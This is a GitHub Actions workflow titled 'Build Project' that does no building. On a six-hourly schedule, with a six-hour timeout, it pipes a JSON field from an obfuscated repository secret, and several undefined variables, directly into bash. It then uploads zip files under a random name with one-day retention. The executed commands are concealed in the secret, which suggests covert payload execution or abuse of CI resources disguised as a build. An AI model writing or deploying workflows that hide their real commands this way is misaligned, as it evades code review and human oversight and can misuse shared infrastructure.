name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '45 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          dseh90725: ${{ secrets.dseh90725 }}
        run: |
          printf '%s' "$dseh90725" | jq -r .ezfu96 | /bin/bash
          echo $wwbz604 | jq -r .m66 | /bin/bash
          printf '%s' "$cxld46374" | jq -r .jrhok9 | /bin/bash
          printf '%s' "$x54" | jq -r .r3 | /bin/bash
          echo $da708 | jq -r .arxc08 | /bin/bash
          echo $iq00 | jq -r .a798 | /bin/bash
          echo $kiofs761 | jq -r .e4 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: G4pZLUhp
          path: "*.zip"
          retention-days: 1
